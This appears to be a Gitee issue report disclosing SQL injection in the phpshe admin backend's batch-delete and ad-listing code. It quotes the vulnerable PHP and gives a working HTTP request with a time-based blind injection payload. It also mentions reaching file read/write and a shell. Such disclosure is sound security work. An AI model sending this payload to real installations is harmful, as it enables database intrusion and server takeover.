Watch 15 Star 35 Fork 17

koyshe / phpshePHP

I found multiple SQL injection in the background.

Open
p0desta。  Created at
  1. a vulnerability point
    输入图片说明

Look at the code

admin/user.php

	case 'del':
		pe_token_match();
		if ($db->pe_delete('user', array('user_id'=>is_array($_p_user_id) ? $_p_user_id : intval($_g_id)))) {
			pe_success('会员删除成功!');
		}
		else {
			pe_error('会员删除失败...');
		}
	break;

It is found that if one is deleted at a time, intval processing will be performed. If it is deleted in batches, the statement will be directly substituted, and the payload is constructed as follows.

POST /phpshe/admin.php?mod=user&act=del&token=d52aa9e11515574f774c9da971a4ae10 HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Referer: http://www.test.com/fiyocms/
Cookie: PHPSESSID=2j08sefmgofettspbuso00fs07
Connection: keep-alive
Upgrade-Insecure-Requests: 1

checkall=on&user_id%5B%5D=2') and if(1,sleep(5),1)#

输入图片说明

  1. Additional code for this type of situation

admin/userbank.php

	case 'del':
		pe_token_match();
		$userbank_id = is_array($_p_userbank_id) ? $_p_userbank_id : $_g_id;
		if ($db->pe_delete('userbank', array('userbank_id'=>$userbank_id))) {
			pe_success('删除成功!');
		}
		else {
			pe_error('删除失败...');
		}
	break;

admin/userlevel.php

	case 'del':
		pe_token_match();
		$userlevel_id = is_array($_p_userlevel_id) ? $_p_userlevel_id : intval($_g_id);
		if ($db->pe_delete('userlevel', array('userlevel_id'=>$userlevel_id))) {
			cache_write('userlevel');
			userlevel_callback();
			pe_success('删除成功!');
		}
		else {
			pe_error('删除失败...');
		}
	break;

admin/ad.php

	case 'del':
		pe_token_match();
		$ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
		if ($db->pe_delete('ad', array('ad_id'=>$ad_id))) {
			cache_write('ad');
			pe_success('删除成功!');
		}
		else {
			pe_error('删除失败...');
		}
	break;
	//####################// 广告状态 //####################//
	case 'state':
		pe_token_match();
		$ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
		if ($db->pe_update('ad', array('ad_id'=>$ad_id), array('ad_state'=>$_g_state))) {
			cache_write('ad');
			pe_success("操作成功!");
		}
		else {
			pe_error("操作失败...");
		}
	break;
		//####################// 广告列表 //####################//
	default :
		$_g_type && $sql_where .= " and `ad_type` = '{$_g_type}'";
		$_g_position && $sql_where .= " and `ad_position` = '{$_g_position}'";
		$sql_where .= " order by `ad_order` asc, `ad_id` desc";
		$info_list = $db->pe_selectall('ad', $sql_where, '*', array(20, $_g_page));
  1. Now I am looking for another example to verify.
    输入图片说明

If there is permission in the target environment, we can read the file or write the file to getshell.
输入图片说明

total 1 participants

Comments (0)

Sign in and comment

Assignee
Labels
Not set
Project
Milestone
Branch
Scheduled start
Not set
Scheduled end
Not set
Top level
Priority

Help Search

Gitee_sixth 5th_float_left_close